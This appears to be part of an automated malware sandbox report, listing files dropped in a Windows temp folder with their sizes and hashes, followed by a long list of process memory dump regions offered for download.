822de2d86b6d1f7b952ef67d031028835604969d14a76fc64af3ea15241fdb11e3e014ddd2cd8048b8fc01a416ca1f7ccc54755cb4416d14bbdfe8680e43bd41

Download Submit
C:\Users\Admin\AppData\Local\Temp\Submitting.wmv

Filesize
76KB

MD5
bb45b1e87dd1b5af5243a1e288a04401

SHA1
f1be3185a0a4c86b0d325734b56c3fa1e40e4c75

SHA256
e337ec32ebae2fcafc5b134519642c0545ca8d53f3ec586a2215556a9ec62510

SHA512
126c4f1cbffd1e1a28e9e7bc67b05f6dd0fc9fc9848902c73931fd449ee8324f246694cf876d40ebb7622a93eaeebf7ed74bdbd288d4d78f2d168314b9412e95

Download Submit
C:\Users\Admin\AppData\Local\Temp\Truth

Filesize
28KB

MD5
7011dd4ea366e5b4856821425af62505

SHA1
52dae5b599554c6e30c17d6d56c657e2c2b9f3dc

SHA256
51420577a0088aa2d64f00262a7a0e82e361246c6c437fb6c9d60b453bff8509

SHA512
a9390c12a26e7856a436445ee4f05279421ca3ca97cc847a9013d3255d6714bcf2d6ab122adf2f2207e75c1a1af7684f3205bf34ebc76fb937f5de55ca448966

Download Submit
C:\Users\Admin\AppData\Local\Temp\Witness.wmv

Filesize
95KB

MD5
be1e5883192a4f06520ae7147d9c43c5

SHA1
45761ba0db2c20940b8e8d1b195982e8973e237b

SHA256
8b41188af16d4d5c200a1fbd6fc09523071ee5ddc5ba75c37ff0e7739c8b6a66

SHA512
f44c8cc421de094e73f61871020bce73d1f355aaed7cd77f89c0d550b977446e4fd1fd85eb4de02ff5eb410de93081ddf41e0e0d975ebdd46c9410206e5642d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hh3pf2en.jix.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ebc59c84-1d9c-4057-ae09-0c701210a265\AgileDotNetRT.dll

Filesize
2.3MB

MD5
5f449db8083ca4060253a0b4f40ff8ae

SHA1
2b77b8c86fda7cd13d133c93370ff302cd08674b

SHA256
7df49cba50cc184b0fbb31349bd9f2b18acf5f7e7fac9670759efa48564eaef1

SHA512
4ce668cf2391422ef37963a5fd6c6251d414f63545efb3f1facb77e4695cd5a8af347bd77fc2bebfa7fd3ef10ff413a7acfde32957037a51c59806577351825f

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp3D52.tmp

Filesize
1KB

MD5
cd28e49c7faf1ea21519d66e65ad72f8

SHA1
d8ba4b7a875ecd14850ede65df4c9cf241d473cc

SHA256
5b02f12ddb22d71e0b6080586d4fb2a3ffebcc03422d9e831136931a35b32890

SHA512
20a28149f589e753d0c5d4e4711584e182f2c389727d850c7085ba6470aa96ea858ac4f83267d26e501753b009fd566aedd568356ffb285535b2d8e48241224f

Download Submit
memory/236-18-0x0000000000E70000-0x0000000001303000-memory.dmp

Filesize
4.6MB

Download
memory/236-16-0x0000000000E71000-0x0000000000EDD000-memory.dmp

Filesize
432KB

Download
memory/236-17-0x0000000000E70000-0x0000000001303000-memory.dmp

Filesize
4.6MB

Download
memory/236-32-0x0000000000E70000-0x0000000001303000-memory.dmp

Filesize
4.6MB

Download
memory/236-33-0x0000000000E71000-0x0000000000EDD000-memory.dmp

Filesize
432KB

Download
memory/236-14-0x0000000000E70000-0x0000000001303000-memory.dmp

Filesize
4.6MB

Download
memory/236-15-0x0000000077586000-0x0000000077588000-memory.dmp

Filesize
8KB

Download
memory/848-714-0x0000000075BA0000-0x0000000075DF2000-memory.dmp

Filesize
2.3MB

Download
memory/848-712-0x00007FFABC480000-0x00007FFABC689000-memory.dmp

Filesize
2.0MB

Download
memory/848-709-0x0000000001280000-0x000000000128A000-memory.dmp

Filesize
40KB

Download
memory/848-711-0x0000000001910000-0x0000000001D10000-memory.dmp

Filesize
4.0MB

Download
memory/892-42-0x0000000000020000-0x00000000006C5000-memory.dmp

Filesize
6.6MB

Download
memory/892-43-0x0000000000020000-0x00000000006C5000-memory.dmp

Filesize
6.6MB

Download
memory/1436-1426-0x00007FF79EE20000-0x00007FF7A046B000-memory.dmp

Filesize
22.3MB

Download
memory/1472-1286-0x0000000000310000-0x00000000007A3000-memory.dmp

Filesize
4.6MB

Download
memory/1472-1256-0x0000000000310000-0x00000000007A3000-memory.dmp

Filesize
4.6MB

Download
memory/1472-57-0x0000000000310000-0x00000000007A3000-memory.dmp

Filesize
4.6MB

Download
memory/1472-30-0x0000000000310000-0x00000000007A3000-memory.dmp

Filesize
4.6MB

Download
memory/1472-1295-0x0000000000310000-0x00000000007A3000-memory.dmp

Filesize
4.6MB

Download
memory/1472-1296-0x0000000000310000-0x00000000007A3000-memory.dmp

Filesize
4.6MB

Download
memory/1472-1297-0x0000000000310000-0x00000000007A3000-memory.dmp

Filesize
4.6MB

Download
memory/1472-1021-0x0000000000310000-0x00000000007A3000-memory.dmp

Filesize
4.6MB

Download
memory/1472-849-0x0000000000310000-0x00000000007A3000-memory.dmp

Filesize
4.6MB

Download
memory/1472-659-0x0000000000310000-0x00000000007A3000-memory.dmp

Filesize
4.6MB

Download
memory/1472-736-0x0000000000310000-0x00000000007A3000-memory.dmp

Filesize
4.6MB

Download
memory/1472-62-0x0000000000310000-0x00000000007A3000-memory.dmp

Filesize
4.6MB

Download
memory/1472-1424-0x0000000000310000-0x00000000007A3000-memory.dmp

Filesize
4.6MB

Download
memory/1472-645-0x0000000000310000-0x00000000007A3000-memory.dmp

Filesize
4.6MB

Download
memory/1580-1425-0x00007FF6CB090000-0x00007FF6CBC31000-memory.dmp

Filesize
11.6MB

Download
memory/1908-1419-0x0000024B78C30000-0x0000024B78C3A000-memory.dmp

Filesize
40KB

Download
memory/1908-1421-0x0000024B78C50000-0x0000024B78C5A000-memory.dmp

Filesize
40KB

Download
memory/1908-1420-0x0000024B78C40000-0x0000024B78C48000-memory.dmp

Filesize
32KB

Download
memory/2068-729-0x0000000000400000-0x0000000000848000-memory.dmp

Filesize
4.3MB

Download
memory/2068-1271-0x0000000000400000-0x0000000000848000-memory.dmp

Filesize
4.3MB

Download
memory/2068-774-0x0000000000400000-0x0000000000848000-memory.dmp

Filesize
4.3MB

Download
memory/2068-773-0x0000000000400000-0x0000000000848000-memory.dmp

Filesize
4.3MB

Download
memory/2068-1290-0x0000000000400000-0x0000000000848000-memory.dmp

Filesize
4.3MB

Download
memory/2068-885-0x0000000000400000-0x0000000000848000-memory.dmp

Filesize
4.3MB

Download
memory/2068-1244-0x0000000000400000-0x0000000000848000-memory.dmp

Filesize
4.3MB

Download
memory/2084-1384-0x000001C9F0A70000-0x000001C9F0A8C000-memory.dmp

Filesize
112KB

Download
memory/2084-1251-0x000001C9F04D0000-0x000001C9F04F2000-memory.dmp

Filesize
136KB

Download
memory/2084-1255-0x000001C9F0A20000-0x000001C9F0A66000-memory.dmp

Filesize
280KB

Download
memory/2724-1292-0x0000000000310000-0x00000000007A3000-memory.dmp

Filesize
4.6MB

Download
memory/2724-1294-0x0000000000310000-0x00000000007A3000-memory.dmp

Filesize
4.6MB

Download
memory/2816-1284-0x0000000000400000-0x0000000000463000-memory.dmp

Filesize
396KB

Download
memory/2816-1285-0x0000000000400000-0x0000000000463000-memory.dmp

Filesize
396KB

Download
memory/2940-658-0x0000000000310000-0x00000000007A3000-memory.dmp

Filesize
4.6MB

Download
memory/2940-656-0x0000000000310000-0x00000000007A3000-memory.dmp

Filesize
4.6MB

Download
memory/3456-806-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/3528-940-0x0000000007120000-0x0000000007176000-memory.dmp

Filesize
344KB

Download
memory/3528-939-0x0000000009A50000-0x0000000009EE6000-memory.dmp

Filesize
4.6MB

Download
memory/3576-37-0x00000000008E0000-0x0000000000D74000-memory.dmp

Filesize
4.6MB

Download
memory/3576-38-0x00000000008E0000-0x0000000000D74000-memory.dmp

Filesize
4.6MB

Download
memory/4004-685-0x00000000053B0000-0x0000000005442000-memory.dmp

Filesize
584KB

Download
memory/4004-700-0x0000000004C80000-0x0000000004C8A000-memory.dmp

Filesize
40KB

Download
memory/4004-705-0x0000000005940000-0x0000000005950000-memory.dmp

Filesize
64KB

Download
memory/4004-696-0x000000006FE70000-0x0000000070450000-memory.dmp

Filesize
5.9MB

Download
memory/4004-701-0x0000000008D20000-0x0000000008DBC000-memory.dmp

Filesize
624KB

Download
memory/4004-810-0x000000006FE70000-0x0000000070450000-memory.dmp

Filesize
5.9MB

Download
memory/4004-683-0x00000000002E0000-0x00000000008CC000-memory.dmp

Filesize
5.9MB

Download
memory/4004-684-0x0000000005960000-0x0000000005F06000-memory.dmp

Filesize
5.6MB

Download
memory/4004-702-0x00000000091C0000-0x000000000922A000-memory.dmp

Filesize
424KB

Download
memory/4004-693-0x000000006FE70000-0x0000000070450000-memory.dmp

Filesize
5.9MB

Download
memory/4004-738-0x000000006FE70000-0x0000000070450000-memory.dmp

Filesize
5.9MB

Download
memory/4004-695-0x000000006FE70000-0x0000000070450000-memory.dmp

Filesize
5.9MB

Download
memory/4004-699-0x0000000070EB0000-0x0000000070F3A000-memory.dmp

Filesize
552KB

Download
memory/4004-794-0x000000000A250000-0x000000000A2A2000-memory.dmp

Filesize
328KB

Download
memory/4284-1269-0x0000000000400000-0x0000000000463000-memory.dmp

Filesize
396KB

Download
memory/4284-1270-0x0000000000400000-0x0000000000463000-memory.dmp

Filesize
396KB

Download
memory/4488-1440-0x0000013E746B0000-0x0000013E747B7000-memory.dmp

Filesize
1.0MB

Download
memory/4488-1434-0x0000013E746B0000-0x0000013E747B7000-memory.dmp

Filesize
1.0MB

Download
memory/4488-1432-0x0000013E746B0000-0x0000013E747B7000-memory.dmp

Filesize
1.0MB

Download
memory/4488-4241-0x0000013E73E40000-0x0000013E73E8C000-memory.dmp

Filesize
304KB

Download
memory/4488-1436-0x0000013E746B0000-0x0000013E747B7000-memory.dmp

Filesize
1.0MB

Download
memory/4488-1429-0x0000013E720D0000-0x0000013E72178000-memory.dmp

Filesize
672KB

Download
memory/4488-1430-0x0000013E746B0000-0x0000013E747BA000-memory.dmp

Filesize
1.0MB

Download
memory/4488-1431-0x0000013E746B0000-0x0000013E747B7000-memory.dmp

Filesize
1.0MB

Download
memory/4488-1444-0x0000013E746B0000-0x0000013E747B7000-memory.dmp

Filesize
1.0MB

Download
memory/4488-4240-0x0000013E725C0000-0x0000013E72616000-memory.dmp

Filesize
344KB

Download
memory/4488-4273-0x0000013E747C0000-0x0000013E74814000-memory.dmp

Filesize
336KB

Download
memory/4488-1438-0x0000013E746B0000-0x0000013E747B7000-memory.dmp

Filesize
1.0MB

Download
memory/4488-1442-0x0000013E746B0000-0x0000013E747B7000-memory.dmp

Filesize
1.0MB

Download
memory/4732-704-0x0000000004D30000-0x0000000005130000-memory.dmp

Filesize
4.0MB

Download
memory/4732-703-0x0000000004D30000-0x0000000005130000-memory.dmp

Filesize
4.0MB

Download
memory/4732-661-0x0000000000430000-0x00000000004AF000-memory.dmp

Filesize
508KB

Download
memory/4732-708-0x0000000075BA0000-0x0000000075DF2000-memory.dmp

Filesize
2.3MB

Download
memory/4732-706-0x00007FFABC480000-0x00007FFABC689000-memory.dmp

Filesize
2.0MB

Download
memory/4732-660-0x0000000000430000-0x00000000004AF000-memory.dmp

Filesize
508KB

Download
memory/4732-663-0x0000000000430000-0x00000000004AF000-memory.dmp

Filesize
508KB

Download
memory/4732-662-0x0000000000430000-0x00000000004AF000-memory.dmp

Filesize
508KB

Download
memory/4732-671-0x0000000000430000-0x00000000004AF000-memory.dmp

Filesize
508KB

Download
memory/4732-672-0x0000000000430000-0x00000000004AF000-memory.dmp

Filesize
508KB

Download
memory/5752-61-0x0000000000010000-0x0000000000A9E000-memory.dmp

Filesize
10.6MB

Download
memory/5752-58-0x0000000000010000-0x0000000000A9E000-memory.dmp

Filesize
10.6MB

Download
memory/5928-865-0x0000000007C30000-0x0000000007CC6000-memory.dmp

Filesize
600KB

Download
memory/5928-863-0x00000000079A0000-0x00000000079BA000-memory.dmp

Filesize
104KB

Download
memory/5928-867-0x0000000007BE0000-0x0000000007BEE000-memory.dmp

Filesize
56KB

Download
memory/5928-813-0x0000000006100000-0x0000000006166000-memory.dmp

Filesize
408KB

Download
memory/5928-866-0x0000000007BB0000-0x0000000007BC1000-memory.dmp

Filesize
68KB

Download
memory/5928-811-0x0000000005FF0000-0x0000000006012000-memory.dmp

Filesize
136KB

Download
memory/5928-870-0x0000000007BF0000-0x0000000007C05000-memory.dmp

Filesize
84KB

Download
memory/5928-871-0x0000000007CF0000-0x0000000007D0A000-memory.dmp

Filesize
104KB

Download
memory/5928-873-0x0000000007CE0000-0x0000000007CE8000-memory.dmp

Filesize
32KB

Download
memory/5928-803-0x00000000051A0000-0x00000000051D6000-memory.dmp

Filesize
216KB

Download
memory/5928-864-0x0000000007A20000-0x0000000007A2A000-memory.dmp

Filesize
40KB

Download
memory/5928-824-0x0000000006170000-0x00000000064C7000-memory.dmp

Filesize
3.3MB

Download
memory/5928-862-0x0000000007FF0000-0x000000000866A000-memory.dmp

Filesize
6.5MB

Download
memory/5928-861-0x0000000007670000-0x0000000007714000-memory.dmp

Filesize
656KB

Download
memory/5928-851-0x000000006FED0000-0x000000006FF1C000-memory.dmp

Filesize
304KB

Download
memory/5928-860-0x0000000007650000-0x000000000766E000-memory.dmp

Filesize
120KB

Download
memory/5928-850-0x0000000006C30000-0x0000000006C64000-memory.dmp

Filesize
208KB

Download
memory/5928-808-0x00000000058C0000-0x0000000005EEA000-memory.dmp

Filesize
6.2MB

Download
memory/5928-812-0x0000000006090000-0x00000000060F6000-memory.dmp

Filesize
408KB

Download
memory/5928-841-0x0000000006B80000-0x0000000006BCC000-memory.dmp

Filesize
304KB

Download
memory/5928-832-0x0000000006670000-0x000000000668E000-memory.dmp

Filesize
120KB

Download
memory/6004-1389-0x0000000005AB0000-0x0000000005AC2000-memory.dmp

Filesize
72KB

Download
memory/6004-1388-0x0000000000280000-0x00000000002DE000-memory.dmp

Filesize
376KB

Download
memory/6004-1397-0x0000000006000000-0x000000000603C000-memory.dmp

Filesize
240KB

Download